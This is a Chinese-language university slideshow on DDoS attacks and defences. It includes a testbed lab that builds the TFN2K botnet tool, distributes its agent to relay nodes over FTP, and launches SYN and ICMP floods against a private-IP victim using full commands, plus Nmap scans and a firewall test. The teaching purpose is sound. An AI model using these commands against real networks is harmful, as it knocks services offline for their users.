module 6 ddos
Download
Skip this Video
Download Presentation
Module 6 :DDoS攻擊與防禦

Loading in 2 Seconds...

play fullscreen
1 / 130

Module 6:DDoS - PowerPoint PPT Presentation


  • 107 Views
  • Uploaded on

Module 6 :DDoS攻擊與防禦. 學習目的. 分散式阻斷服務攻擊 (Distributed Denial of Service) 為目前駭客對商業服務主要的攻擊方式之一,容易造成被攻擊之服務提供者嚴重的商業利益損失,且難以防禦和追查來源 本單維共有七個小節包括 (1) DDoS 的起源與定義 (2) DDoS 的原理 (3) DDoS 的攻擊類型 (4) DDoS 的防禦 (5) DDoS 工具介紹 (6) DDoS 的實務 (7) DDoS 的專案實作 共需三個鐘點. Module 6 : DDoS 攻擊與防禦演練實習.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Module 6:DDoS' - phuoc


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
slide2
學習目的
  • 分散式阻斷服務攻擊(Distributed Denial of Service)為目前駭客對商業服務主要的攻擊方式之一,容易造成被攻擊之服務提供者嚴重的商業利益損失,且難以防禦和追查來源
  • 本單維共有七個小節包括

(1) DDoS的起源與定義

(2) DDoS的原理

(3) DDoS的攻擊類型

(4) DDoS的防禦

(5) DDoS工具介紹

(6) DDoS的實務

(7) DDoS的專案實作

共需三個鐘點

module 6 ddos1
Module 6:DDoS攻擊與防禦演練實習
  • Module 6-1: DDoS的起源與定義(*)
  • Module 6-2: DDoS的原理(*)
  • Module 6-3: DDoS的攻擊類型(*)
  • Module 6-4: DDoS的防禦(**)
  • Module 6-5: DDoS工具介紹(*)
  • Module 6-6: DDoS的實務 (**)
  • Module 6-7: DDoS的專案實作(**)

* 初級(basic):基礎性教材內容

**中級(moderate):教師依據學生的吸收情況,選擇性介紹本節的內容

***高級(advanced):適用於深入研究的內容

slide5
隨著網際網路商業服務的增加,分散式阻斷服務攻擊(Distributed Denial of Service)事件越來越多,探究其原因乃出於商業競爭、對手報復及網路敲詐等多種因素

隨網路多種DDoS駭客工具的散佈,實施攻擊困難度降低,DDoS攻擊事件亦隨之上升

DoS攻擊的出現最初是在1996~97年之間,此時美國的資訊雜誌上已流傳著簡單的DoS攻擊工具

DDoS起源

ICMP DoS攻擊之原理與防禦方法

資料來源:http://www.iii.org.tw/adc/papers/thesis/00B02.htm

slide6
DDoS定義
  • 阻斷服務攻擊可區分為
    • 阻斷服務攻擊(Denial of Service, DoS)為一導致電腦無法進行網路活動的網路攻擊行為,其會造成使用者無法進行連線
    • 分散式阻斷服務攻擊(Distributed Denial of Service, DDoS) 為駭客操控大量殭屍電腦(Zombies)同時進行DoS攻擊,以達到用戶無法使用網路服務的目標
slide7
DDoS和DoS的差異

DoS攻擊是透過攻擊主機的特定漏洞,造成網路功能異常、系統當機且無法提供正常的網路服務,形成阻斷服務攻擊

DDoS攻擊是透過多台被駭客控制之“殭屍主機(Zombies)”,向受害主機進行DoS攻擊,進而造成其網路阻塞或伺服器資源耗盡以致阻斷服務

DDoS定義 (續)
slide8
DDoS危害

實施阻斷服務攻擊時,大量攻擊網路封包猶如洪水般向受害主機發送,導致合法用戶的網路連線切斷,故阻斷服務攻擊也被稱為“洪水式攻擊(Flood Attacks)”

就兩種阻斷服務攻擊而言,危害較大的是DDoS攻擊,因其與一般使用者之正常行為類似,故較難防範;至於DoS攻擊,透過將主機伺服器漏洞進行修補或安裝防火牆軟體即可有效達到防護目的

slide9
DDoS網路攻擊之結果為商業損失、法律糾紛及客戶投訴,因此,解決DDoS攻擊問題成為網路服務供應商(Internet Service Provider, ISP)首要任務

最新發展─資安研究專家預測,駭客集團利用合法雲端運算服務的犯罪將會越來越多,例如亞馬遜的Elastic Computing Cloud(EC2)服務和Google的App Engine

將企業內部的服務或應用程式資源移到雲端後,防禦工作從企業內部轉嫁給雲端運算供應商,資安威脅仍然存在

DDoS危害(續)
slide10
雲端運算之基礎設施即服務(Infrastructure as a Service, IaaS)面對DDoS攻擊手法,駭客利用大量殭屍電腦同時攻擊,來達到妨礙正常雲端服務使用者使用的目的

駭客預先入侵大量主機以後,在被害主機上安裝DDoS攻擊程式控制被害主機,再對攻擊目標展開攻擊,利用這樣的方式可以迅速產生極大的網路流量、癱瘓攻擊目標

Amazon提供的EC2服務於2009年12月就遭受過以Zeus botnet 為基礎之DDoS攻擊

DDoS危害(續)

6-10

slide12
阻斷服務攻擊

DoS攻擊大部分採用一對一攻擊;當受攻擊之目標其資源不足時(例:CPU執行速度低、記憶體過小或網路頻寬過小等),攻擊成效更為明顯

隨著電腦與網路技術的發展,電腦的處理能力迅速增長,記憶體增大,網路頻寬也越來越大,這使得DoS攻擊的困難度增加

若利用特定弱點所造成之DoS,通常只要將該弱點修復,便能有效阻擋該種DoS攻擊

slide13
DDoS攻擊利用被攻擊者入侵控制之殭屍主機(Zombies)發起攻擊,以更大的規模來進攻目標DDoS攻擊利用被攻擊者入侵控制之殭屍主機(Zombies)發起攻擊,以更大的規模來進攻目標

其手法特色是必須先入侵一定數量的殭屍主機並植入跳板程式;攻擊發動時,駭客自遠端操控攻擊

高速網路對攻擊者而言是極為有利的條件,攻擊者欲佔領攻擊用的殭屍主機時,會優先考慮離目標網路距離近的主機。因為經過路由器的跳躍數(Hops) 少,攻擊效果較佳

分散式阻斷服務攻擊
slide15
被DDoS攻擊時,目標主機的現象

有大量等待中的TCP連線要求

網路中充斥著大量無用的資料封包

由於網路阻塞,受害主機無法與外界網路正常通訊

如目標主機提供之服務或傳輸協定有漏洞時,會收到大量服務請求,造成正常連線請求無法獲得回應

系統可能會當機

分散式阻斷服務攻擊 (續)
slide16
分散式阻斷服務攻擊 (續)

受害主機之CPU loading

slide17
分散式阻斷服務攻擊 (續)

受害主機之網路使用率

slide18
分散式阻斷服務攻擊 (續)

受害主機未遭受攻擊時

slide19
分散式阻斷服務攻擊 (續)

受害主機之當機現象

slide21
DDoS攻擊程式的分類,可依照自動化程度分為手動、半自動及自動攻擊三種DDoS攻擊程式的分類,可依照自動化程度分為手動、半自動及自動攻擊三種

手動攻擊:早期的DDoS攻擊程式多半屬之,駭客手動尋找可入侵的電腦,入侵並植入攻擊程式後再下指令攻擊目標

半自動攻擊:使用專門的程式控制攻擊用的殭屍主機。駭客散佈自動化的入侵工具入侵殭屍主機,然後使用專門程式控制所有殭屍主機,針對目標發動DDoS攻擊

DDoS的攻擊類型
slide22
自動攻擊:更進一步自動化整個攻擊步驟,將攻擊的目標、時間及方式都事先寫在攻擊程式裡,當駭客散佈攻擊程式後便自動掃描可入侵的主機,植入攻擊程式後,在預定的時間對指定目標發動攻擊,如W32/Blaster蠕蟲即屬於此類自動攻擊:更進一步自動化整個攻擊步驟,將攻擊的目標、時間及方式都事先寫在攻擊程式裡,當駭客散佈攻擊程式後便自動掃描可入侵的主機,植入攻擊程式後,在預定的時間對指定目標發動攻擊,如W32/Blaster蠕蟲即屬於此類DDoS的攻擊類型 (續)

顯揚資訊有限公司--知識庫--DDoS分散式阻斷服務(DistributedDenialofService)

資料來源:http://www.hsienyang.com/knowledge/?page=2

slide23
DDoS的攻擊類型 (續)
  • DDoS攻擊手段依照「網路協定」與「連線方式」可分為8種,以下簡介其中較常見的三種攻擊
    • TCP Flood
    • ICMP Flood
    • UDP Flood
    • ACK Flood
    • SYN Flood
    • Connections Flood
    • Script Flood
    • Proxy Flood
tcp flood
大量發送正常或異常的TCP網路封包,造成被攻擊主機其網路超出負荷無法處理,導致該主機所提供之網路服務停止運作大量發送正常或異常的TCP網路封包,造成被攻擊主機其網路超出負荷無法處理,導致該主機所提供之網路服務停止運作

TCP Flood攻擊主要有三種實作攻擊模式,分別為

Land攻擊

Teardrop攻擊

TCP SYN Flood攻擊

TCP Flood攻擊
tcp flood1
Land攻擊

為一種使用攻擊者發送一來源端和目的端相同的網路位址之TCP同步請求連線至目標電腦,造成無窮迴路的連線逾時(Timeout)

重覆傳送將耗去許多系統資源,進而造成被攻擊端電腦當機

TCP Flood攻擊 (續)
tcp flood2
Teardrop攻擊

為利用TCP網路封包分割、重組間的弱點之攻擊

正常的TCP網路傳輸,封包片段(Fragment)是一個以互相連續且不重疊的方式,依序傳入目標主機,並將其重新組合

若有心人刻意以不規則的正常封包序列,將造成某些作業系統對不正常封包進行偵測及處理,嚴重時系統甚至會當機或網路暫停連線服務

TCP Flood攻擊 (續)
tcp flood3
TCP SYN Flood攻擊

運用程式假冒IP大量發送TCP同步連線至攻擊目標,但卻不回覆確認(Acknowledgment)訊號 ,造成空連線或逾時耗去系統資源

當作業系統未針對此弱點進行修補,此攻擊中的大量TCP連線將消耗用來記錄連線(Session)的記憶空間,最後造成系統當機或超載(Overloading)

TCP Flood攻擊 (續)
tcp flood4
TCP Flood攻擊 (續)

TCP Flood攻擊

icmp flood
ICMP Flood攻擊

ICMP Flood攻擊是指短時間內對目標主機傳送大量的ICMP封包,造成目標主機資源耗盡

ICMP DoS攻擊可分為Ping of Death與Smurf二種主要攻擊方式

Ping of Death攻擊利用指令「Ping 」,將超過65535 bytes的Ping封包送到攻擊目標

假如主機系統(TCP/IP Stack) ,未對連線封包進行控管,當接收到此類封包,將產生封包無法處理,網路連線發生錯誤的問題,最後造成系統當機或重開機的現象

icmp flood1
Smurf攻擊是攻擊者向路由器(Router)發送廣播的ICMP封包,造成該區域網路充滿廣播封包,而影響網路連線或中斷服務Smurf攻擊是攻擊者向路由器(Router)發送廣播的ICMP封包,造成該區域網路充滿廣播封包,而影響網路連線或中斷服務

Smurf會以程式大量製作假冒IP的ICMP Request封包,針對攻擊位址進行廣播,然後廣播位址會回傳ICMP Response封包給目標電腦,造成網路連線變慢或中斷服務

除了攻擊特定目標主機,網路Smurf的攻擊方式也能以雙向攻擊-ICMP的Request封包與Response封包,增加網路攻擊量,迅速造成網路中斷,此種方式常被稱為Smurf倍增型攻擊

ICMP Flood攻擊 (續)
icmp flood2
ICMP Flood攻擊 (續)

ICMP Flood攻擊

udp flood
UDP Flood攻擊

透過UDP協定送出假冒IP來源端之資訊的廣播封包至目標網路,造成網路壅塞進而中止服務

當目的網路中有多台主機回應,便可造成網路的壅塞

UDP是一種不需建立連接(Connectionless)的協定,而且它不需要用任何程式建立連接來管制傳輸資料,故很難以單一網路設備進行有效控管

slide34
DDoS攻擊的防禦
  • 網路防護
    • 通信埠檢測- CurrPorts:使用免費之主機之通信阜之檢測工具,觀察通信阜之開啟是否有異常、本機開啟那個連接埠?在遠端開啟什麼連接埠?使用CurrPorts讓使用者一目了然,可作為在電腦簡易判斷是否被植入木馬
    • 基本防護-防火牆:以連線過濾的技術,過濾對外開放的port
slide35
DDoS攻擊的防禦 (續)
  • 進階防護-入侵防護系統(IPS):以封包過濾的技術,過濾對外開放的port。可防止假冒位址的攻擊,使得外部機器無法假冒內部機器的位址來對內部機器發動攻擊
slide36
DDoS攻擊的防禦 (續)

以CurrPorts觀察主機之通信埠開啟是否有異常

6-36

slide37
DDoS攻擊的防禦 (續)

針對可疑或異常通信埠進行檢視及關閉連線

將CurrPorts設定為電腦啟動便自動執行

6-37

slide38
DDoS攻擊的防禦 (續)
    • 進階防護 - 路由器:運用存取控制表(Access Control List, ACL) 過濾連線IP,針對SYN封包與網路流量進行控管、並將路由器升級至最新版本
  • 主機防護
    • 關閉不必要的網路服務
    • 系統修補(Patch)
    • 定期執行系統弱點掃描(Vulnerabilities Scan)
    • 防毒軟體
slide39
DDoS攻擊的防禦 (續)

關閉不必要的網路服務

6-39

slide40
DDoS攻擊的防禦 (續)

排除異常連線的網站

6-40

slide41
DDoS攻擊的防禦 (續)

定期執行系統更新與修補

6-41

slide42
DDoS攻擊的防禦 (續)

定期執行系統掃描

6-42

slide43
DDoS攻擊的防禦 (續)

注意網路最新的威脅並將設定為掃瞄的對象

6-43

ddos nmap
DDoS攻擊之檢測:NMAP

NMAP全名是Network Mapper,是一個網路應用程式,由Fyodor Vaskovich於1997年所開發的一套開放原始碼軟體,可以檢測本機或網路遠端主機的安全性弱點、提供網路服務、主機作業系統、封包過濾器及防火牆種類等等資訊,作為安全性的監控工具

NMAP亦可掃描指定的網路位址或某個網段,對內部網路進行掃描內網主機是否有開啟不正常的通信埠

ddos nmap1
DDoS攻擊之檢測:NMAP (續)
  • NMAP的支援功能
    • Vanilla TCP connect() scanning
    • TCP SYN (half open) scanning
    • TCP FIN, Xmas, or NULL (stealth) scanning
    • TCP ftp proxy (bounce attack) scanning
    • SYN/FIN scanning using IP fragments

(bypasses some packet filters)

    • TCP ACK and Window scanning
    • UDP raw ICMP port unreachable scanning
ddos nmap2
DDoS攻擊之檢測:NMAP (續)
  • NMAP的支援功能
    • ICMP scanning(ping-sweep)
    • TCP Ping scanning
    • Direct (non portmapper) RPC scanning
    • Remote OS Identification by TCP/IP Fingerprinting
    • Reverse-ident scanning
slide47
DDoS網路防禦:防火牆
  • 防火牆通常用於保護內部網路不受外部網路的非授權連線;它位於客戶端和伺服器之間,因此利用防火牆來阻止DDoS攻擊,可有效地保護內部的伺服器
  • 以SYN Flood為例,針對SYN Flood,防火牆通常有三種防護方式
    • SYN閘道
    • 被動式SYN閘道
    • SYN中繼
slide48
DDoS網路防禦:防火牆 (續)
  • SYN閘道
    • 將防火牆當作閘道(Gateway) ,當收到用戶端的SYN封包時,直接轉發給伺服器
    • 防火牆收到伺服器的SYN/ACK封包後,一方面將SYN/ACK封包轉發給用戶端,另一方面以代理用戶身份回送ACK封包給伺服器,完成TCP三向交握(Three-Way Handshake)
    • 當用戶端真正的ACK封包到達時,檢查若封包有資料則轉發給伺服器,否則丟棄(Drop)該封包
slide49
DDoS網路防禦:防火牆 (續)
  • 被動式SYN閘道
    • 將防火牆用做閘道(Gateway)或代理伺服器(Proxy),設置防火牆的SYN請求超時參數(Commtimeouts) ,讓它遠小於伺服器的超時期限(Expired Timing)
    • 與SYN閘道作用相同,防火牆將轉發客戶端傳送至伺服器的SYN封包,伺服器傳送客戶端的YN/ACK封包、以及客戶端傳送伺服器的ACK封包
    • 如果客戶端在防火牆計時器到期時,還沒回傳ACK封包,則防火牆即代伺服器發送RST封包,使伺服器完成TCP三向交握(Three-Way Handshake)
slide50
DDoS網路防禦:防火牆 (續)

防火牆防止DDoS SYN Flood原理

資料來源:http://www.bingdun.com/dDoStech/778.htm

  • SYN中繼防火牆
    • 防火牆作為完整的代理伺服器(Proxy) ,可完全過濾對伺服器發出之無效連線
    • 在收到客戶端的SYN封包後,並不向伺服器轉發,而是記錄該狀態資訊,然後主動給用戶端回送SYN/ACK封包
    • 如果收到客戶端的ACK封包,視為是合法連線,由防火牆向伺服器發送SYN封包並完成三向交握
ddos ips
DDoS網路防禦:入侵防護系統(IPS)

Signature-based偵測:根據已知DoS或DDoS攻擊特徵,分析網路資訊封包,以偵測攻擊

Anomaly-based偵測:由監視主機或網路的效能,建立平時的網路流量基準值(Baseline);並可結合SNMP與NetFlow的基準值作為是否有異常行為的依據

資料探勘(Data-mining)的技術來分析網路流量:除上述兩種偵測技術,近年來有許多學者利用資料探勘的分析方法,改善DDoS之偵測正確性

結合防火牆或運用連線的指令如connect、drop及disconnect來管制

slide53
複合式攻擊軟體

優:可同行進行多種網路攻擊

缺:安裝複雜,且環境為Linux不易上手

例: TFN2K

單一攻擊軟體

優:易上手,視窗介面

缺:攻擊模式單一

例: UDP Flooder與Trinoo

DDoS攻擊工具比較
ddos tfn2k
Tribe Flood Network 2000(TFN2K)為德國著名黑客Mixter所編寫的攻擊工具,其原理為透過主控端控制大量的代理主機(跳板)進行DDoS攻擊

目前此工具可攻擊Unix、Solaris及Windows NT等平台的主機,且TFN2K非常容易移植到其他平台

本教材以TFN2K軟體進行實驗

DDoS攻擊工具 - TFN2K
ddos tfn2k1
TFN2K攻擊模式由二部份組成,分別有主控端及代理端(跳板)二支程式,主控端可向代理端發送攻擊目標,代理端則對此攻擊目標進行阻斷式服務攻擊(DoS)TFN2K攻擊模式由二部份組成,分別有主控端及代理端(跳板)二支程式,主控端可向代理端發送攻擊目標,代理端則對此攻擊目標進行阻斷式服務攻擊(DoS)

另外主控端控制多個代理端(跳板)指定攻擊目標,則可對此攻擊目標進行分散式阻斷服務攻擊(DDoS)

整個TFN2K工具所建立網路,可能使用不同的TCP、UDP或ICMP協定進行連結,且主控端還能偽造其IP位址

DDoS攻擊工具 - TFN2K (續)
ddos tfn2k2
攻擊指令參數說明

-f:將IP列表讀入,以進行分散式阻斷服務攻擊

-h:指定IP位址,將進行阻斷式服務攻擊( DoS)

-p:指定攻擊受害端port

DDoS攻擊工具 - TFN2K (續)
ddos tfn2k3
- c:詳細如下,分成11個選項

0:停止攻擊

1:反詐欺設定,將來源端IP位址設定為隨機

2:可改變封包大小

3:綁定root shell,啟動對話視窗,指定一個port就會開啟一個root shell

4:UDP SYN Flood攻擊

5:TCP SYN Flood攻擊

DDoS攻擊工具 - TFN2K (續)
ddos tfn2k4
DDoS攻擊工具 - TFN2K (續)

6:ICMP攻擊,將發送虛擬位址的Ping請求,目標主機會回送相同大小的封包

7:Smurf攻擊,用目標主機的位址發送Ping請求以廣播擴大,目標主機將得到一倍多的回覆

8:MIX攻擊,按照1:1:1的關係交互發送UDP、TCP及ICMP封包,可針對路由器及其他封包轉送設備進行攻擊,例:NIDS與Sniffers等

9:TARGA3攻擊,透過發送介於TCP/IP裡灰色區域(Request For Comment, RFC)的封包,造成作業系統當機,網路停止運作的攻擊方式

10:遠端命令執行,為TFN2K附加功能,可遠端控制所有代理端。例:在所有代理端上建立目錄

ddos udp flooder
DDoS攻擊工具 - UDP Flooder

UDP Flooder是一個UDP協定封包發送軟體,可在Windows簡易的平台操作,對特定的IP和Port發出UDP協定封包進行攻擊

UDP封包可由一個測試字串,或由一定Byte數組成,也可由一個文件的資料組成。一般用於伺服器效能測試

ddos trinoo
DDoS攻擊工具 -Trinoo

Trinoo其攻擊方式是針對所選定的攻擊目標,隨機對其所開port發出全零的4位元組UDP封包;當遭受此攻擊的電腦在處理這些超出其處理能力的垃圾封包時,其網路性能會不斷下降,直到網路不能提供正常服務

拒絕服務攻擊介紹

資料來源:http://www.lslnet.com/linux/f/docs1/i42/big5296566.htm

slide61
DDoS防禦可針對網路端及主機端兩方面進行防禦DDoS防禦可針對網路端及主機端兩方面進行防禦

主機端

安裝防毒和防火牆軟體,注意作業系統的更新,避免被駭客植入惡意程式,成為DDoS攻擊的跳板

網路端

架設可防護DDoS攻擊之防火牆或入侵防禦系統,善用路由器之設定,並注意網路設備IOS的更新

DDoS攻擊的跳板偵測有賴執法機關、管理者及使用者的主動察覺,定期檢查開啟的port 及關閉不需要的服務,透過網域之間通報,防止DDoS攻擊

結論
slide63
實驗環境介紹
  • 以Testbed建立一實驗,相關拓樸及設定如下圖

node1

OS:FC6-yum-STD

IP1:10.1.2.3

IP2: 10.1.1.2

執行攻擊跳板程式

IP1

node0

OS: FC6-yum-STD IP:10.1.2.4

安裝軟體:TFN2K

IP2

node3

OS:WINXP-SP3-CH-pc3000

IP:10.1.1.3

安裝軟體:Nmap

node2

OS: FC6-yum-STD

IP1:10.1.2.2IP2:10.1.1.4

執行攻擊跳板程式

IP1

IP2

on testbed@twisc gui
實驗拓樸 on Testbed@TWISC- 利用GUI介面拉實驗拓樸
slide65
說明

阻斷服務攻擊主要是利用作業系統軟體或通訊協定的缺失,使主機或網路出現異常無法提供服務

為了實證阻斷服務攻擊情境,本模組規劃三個實驗案例,模擬網路主機遭受DDoS攻擊及防禦的情境

第一實驗,DDoS攻擊之之檢測:利用Nmap工具,掃描指定的網路位址或某個網段主機的脆弱點,檢測主機是否存在DDoS攻擊相關的脆弱點

第二實驗,攻擊未安裝DDoS防護系統之目標:運用TFN2K發動DDoS攻擊,並觀察受害端相關流量訊息

第三實驗,攻擊已安裝DDoS防護系統之目標:啟動防火牆後,運用TFN2K發動DDoS攻擊,並觀察受害端相關流量訊息

slide66
說明 - 掃描主機脆弱點 & DDoS攻擊
  • 架設實作(一),DDoS攻擊之檢測
    • 使用node3主機,利用Nmap軟體檢測主機是否存在DDoS攻擊相關的脆弱點
  • 架設實作(二),攻擊未安裝DDoS防護系統之目標
    • 使用node0主機,利用TFN2K軟體作為模擬攻擊者使用node1&2主機,作攻擊跳板
    • 使用node3主機,模擬遭受DDoS攻擊,並開啟工作管理員與流量監測軟體觀查是否受攻擊
slide67
架設實作(三),攻擊安裝DDos防護系統之目標

與架設實作(二)使用相同環境,模擬網路主機遭受DDoS攻擊,並安裝防護系統以測試其防護能力

使用node3主機,利用加裝防火牆並開啟工作管理員監控是否受攻擊與抵擋

說明 - DDoS攻擊之防護
slide68

架設實作(一)

DDoS攻擊之檢測

6-68

slide69
版本

nmap-5.51-setup

支援作業平台

Linux與Windows

下載位址

http://insecure.org/

網路掃描工具 - Nmap
ddos ddos
DDoS攻擊與防禦實驗 - DDoS攻擊檢測
  • Nmap系統安裝:從insecure官網http://insecure.org/取得,可安裝於linux及Windows作業系統,此處以Windows作業系統為例

6-70

ddos ddos1
DDoS攻擊與防禦實驗 - DDoS攻擊檢測(續)
  • 接著點選畫面左方的Download,即可進入如下頁面
  • 找到Windows binaries這個項目,點選下方的Latest stable release self-installer: nmap-5.51-setup.exe ,即可開始下載及安裝

6-71

ddos ddos2
系統安裝非常簡易,在安裝檔上方用滑鼠快速點擊兩下,即可開始安裝。安裝完成後,會在桌面上自動建立捷徑,點選兩下會出現如下畫面系統安裝非常簡易,在安裝檔上方用滑鼠快速點擊兩下,即可開始安裝。安裝完成後,會在桌面上自動建立捷徑,點選兩下會出現如下畫面DDoS攻擊與防禦實驗 - DDoS攻擊檢測(續)

6-72

ddos ddos3
DDoS攻擊與防禦實驗 - DDoS攻擊檢測(續)
  • Nmap最簡單的語法,就是接上掃描的IP:Nmap xxx.xxx.xxx.xxx,其餘常用command switch指令如下:

6-73

ddos ddos4
ICMP 掃描:-P0

常用Ping Sweeping指令

Nmap -P0 xxx.xxx.xxx.xxx

直接掃描通信埠22 :Nmap -P0 -p 22 xxx.xxx.xxx.xxx

掃描通信埠21、80 、53:Nmap -P0 -p 21,80, 53 xxx.xxx.xxx.xxx

指定port range,直接掃描通信埠1到128:Nmap -P0 -p 1-128 xxx.xxx.xxx.xxx

DDoS攻擊與防禦實驗 - DDoS攻擊檢測(續)
ddos ddos5
DDoS攻擊與防禦實驗 - DDoS攻擊檢測(續)
  • 掃描區網主機10.1.1.3之21、80、53 port
  • 指令:nmap -P0 -p 21,80,53 10.1.1.3

6-75

ddos ddos6
DDoS攻擊與防禦實驗 - DDoS攻擊檢測(續)
  • 掃描一個子網段並列出詳細的資訊:nmap -v xxx.xxx.xxx.xxx/a
  • 指令:nmap -v v 10.1.1.3/24

6-76

ddos ddos7
DDoS攻擊與防禦實驗 - DDoS攻擊檢測(續)
  • 列出子網段所有的主機及已開啟的通信

6-77

ddos ddos8
DDoS攻擊與防禦實驗 - DDoS攻擊檢測(續)
  • 列出子網段的網路拓樸
  • 指令:nmap /23 -d2 10.1.1.3

6-78

ddos ddos9
DDoS攻擊與防禦實驗 - DDoS攻擊檢測(續)
  • 於上頁圖片的Hosts Viewer按鈕
  • 查看主機之作業系統版本
slide80

架設實作(二)

攻擊未安裝DDoS防護系統之目標

ddos tfn2k5
版本

Tribe Flood Network 2000

支援作業平台

Linux與FreeBSD

其他需求

須先安裝gcc套件

DDoS攻擊工具 - TFN2K
tfn2k
先於攻擊端(node0)安裝DDoS攻擊工具

安裝TFN2K工具,作業系統環境需具備gcc套件; 而Testbed@TWISC上提供的Fedora Core 6本身已有gcc套件,故不需要再進行gcc套件安裝

於node0主機安裝

TFN2K安裝步驟
tfn2k1
TFN2K安裝步驟 (續)

於/tmp下建立本次實驗資料夾「DDoS」

(node0)指令為

cd /tmp

mkdir DDoS

ls

tfn2k2
TFN2K安裝步驟 (續)

下載tfn2k.tgz

指令為

cd DDoS

cp /share/isc/Module06/tfn2k.tgz .

tfn2k3
TFN2K安裝步驟 (續)

解壓縮tfn2k.tgz

指令為

tar -xvzf tfn2k.tgz

tfn2k4
TFN2K安裝步驟 (續)
  • 解壓縮後,進入tfn2k/src資料夾尋找ip.h檔
  • 指令為
    • cd tfn2k/src
    • ls
tfn2k5
TFN2K安裝步驟 (續)
  • 執行修改ip.h檔
  • 指令為
    • vi ip.h
tfn2k6
TFN2K安裝步驟 (續)
  • 執將方塊內的程式前後加上註解/* */,則不執行此段程式
tfn2k7
TFN2K安裝步驟 (續)
  • 按Esc鍵
  • 輸入『 :wq』進行儲存與結束編輯
tfn2k8
輸入『 cd .. 』至tfn2k資料夾

輸入『 sudo make 』進行編輯

接著輸入『 y 』,繼續進行安裝

TFN2K安裝步驟 (續)
tfn2k9
輸入金鑰(可自訂),在進行攻擊時須輸入此金鑰輸入金鑰(可自訂),在進行攻擊時須輸入此金鑰TFN2K安裝步驟 (續)
slide94
主控端上傳td檔案

Testbed平台上有台共用FTP, IP為192.168.36.116

帳密為:user/user

指令為

ncftpput -u <使用者名稱><欲上傳主機> <欲上傳主機資料夾位置><欲上傳檔案位置>

mv td td-<帳號>

ncftpput -u user 192.168.36.116 . td-child

驗證安裝是否成功 (續)

為區別每位使用者的td檔,故需配合改檔名

slide95
驗證安裝是否成功 (續)

跳板電腦(node2)下載td檔案

(node2)指令為

ncftpget -u <使用者名稱><欲下載主機> <欲下載主機資料夾位置><欲下載檔案位置>

cd /tmp

ncftpget -u user ftp://192.168.36.116/tdfile/td-child

檔名:td-child,請依您的檔名做修改

slide96
驗證安裝是否成功 (續)
  • 執行權限並執行td
  • 指令為
    • sudo chmod a+x td-child
    • sudo ./td-child
slide97
攻擊端(node0)新增跳板電腦IP清單

(node0)指令為

touch host.txt

echo "10.1.1.4" > host.txt

cat host.txt

驗證安裝是否成功 (續)
slide98
測試與跳板電腦之間連線,並測試建立資料夾,在執行測試指令前,需先輸入金鑰方可執行測試與跳板電腦之間連線,並測試建立資料夾,在執行測試指令前,需先輸入金鑰方可執行

指令為

sudo ./tfn -f host.txt -c 10 -i "mkdir DDoS-test"

驗證安裝是否成功 (續)
slide99
跳板電腦(node2)出現測試資料夾

路徑位於與td檔相同處

(node0)指令為

ls

驗證安裝是否成功 (續)
ddos tfn2k6
輸入TCP SYN flood攻擊指令

(node0)指令為

sudo ./tfn -f host.txt -c 5 -i 10.1.1.3

DDoS攻擊測試 - TFN2K
ddos tfn2k7
DDoS攻擊測試 - TFN2K (續)
  • 開始TCP SYN flood攻擊後 - 受害端網路流量大幅提升
ddos tfn2k8
DDoS攻擊測試 - TFN2K (續)

停止TCP SYN flood攻擊指令

指令為

sudo ./tfn -f host.txt -c 0

ddos tfn2k9
DDoS攻擊測試 - TFN2K (續)
  • 停止TCP SYN flood攻擊後 - 受害端網路流量恢復正常
ddos tfn2k10
DDoS攻擊測試 - TFN2K (續)
  • 輸入ICMP攻擊指令
  • 指令為
    • sudo ./tfn -f host.txt -c 6 -i 10.1.1.3
ddos tfn2k11
DDoS攻擊測試 - TFN2K (續)
  • 開始ICMP攻擊後 - 受害端CPU使用率升高
ddos tfn2k12
DDoS攻擊測試 - TFN2K (續)
  • 停止ICMP攻擊指令
  • 指令為
    • sudo ./tfn -f host.txt -c 0
ddos tfn2k13
DDoS攻擊測試 - TFN2K (續)
  • 停止ICMP攻擊後 - 受害端CPU使用率恢復正常
slide108

架設實作(三)

攻擊安裝DDos防護系統之目標

slide109
DDoS攻擊與防禦實驗 - 架設實作(三)
  • 將透過攻擊端向代理端對指定攻擊目標(受害端)進行TCP SYN Flood攻擊與ICMP攻擊,並觀察安裝有防火牆軟體的受害端其相關流量訊息
ddos pc tools firewall plus
DDoS防禦工具 - PC Tools Firewall Plus
  • 版本
    • 7.0.0.123
  • 支援作業平台
    • Windows XP與 Windows 7
  • 下載位址
    • http://www.pctools.com/mirror/fwinstall.exe
slide111
一、首先參考案例一的步驟進行DDoS攻擊工具 - TFN2K的安裝

二、於受害端電腦(node3)安裝PC Tools Firewall Plus,並觀察其狀態

DDoS防禦之安裝步驟
slide112
防火牆安裝 - 注意事項
  • 安裝完防火牆後,請於防火牆設定檔內,建立一規則允許遠端桌面連線

6-112

ddos pc tools firewall plus1
DDoS防禦測試 - PC Tools Firewall Plus
  • 攻擊開始前,可從受害端安裝的防火牆,看到網路封包量正常
ddos pc tools firewall plus2
DDoS防禦測試 - PC Tools Firewall Plus
  • 攻擊進行前,可從受害端工作管理員看到系統狀態正常
ddos pc tools firewall plus3
DDoS防禦測試 - PC Tools Firewall Plus (續)
  • 三、攻擊端開始進行DDoS攻擊 - TCP SYN Flood攻擊與ICMP攻擊,並觀察受害端電腦其異常狀端
  • 攻擊端輸入TCP SYN flood攻擊指令進行攻擊
  • 指令為
    • sudo ./tfn -f host.txt -c 5 -i 10.1.1.3
ddos pc tools firewall plus4
遭受攻擊時,受害端電腦防火牆的狀態,受害端電腦其網路連線於短時間內大量增加,但約9成的連線被防火牆阻斷服務遭受攻擊時,受害端電腦防火牆的狀態,受害端電腦其網路連線於短時間內大量增加,但約9成的連線被防火牆阻斷服務DDoS防禦測試 - PC Tools Firewall Plus (續)
ddos pc tools firewall plus6
DDoS防禦測試 - PC Tools Firewall Plus (續)
  • 從防火牆將TCP SYN Flood攻擊擋住了,此時受害端其上網行為可正常動作
ddos pc tools firewall plus7
DDoS防禦測試 - PC Tools Firewall Plus (續)
  • 實驗結束後,請務必記得要將攻擊停止
  • 停止TCP SYN flood攻擊指令
  • 指令為
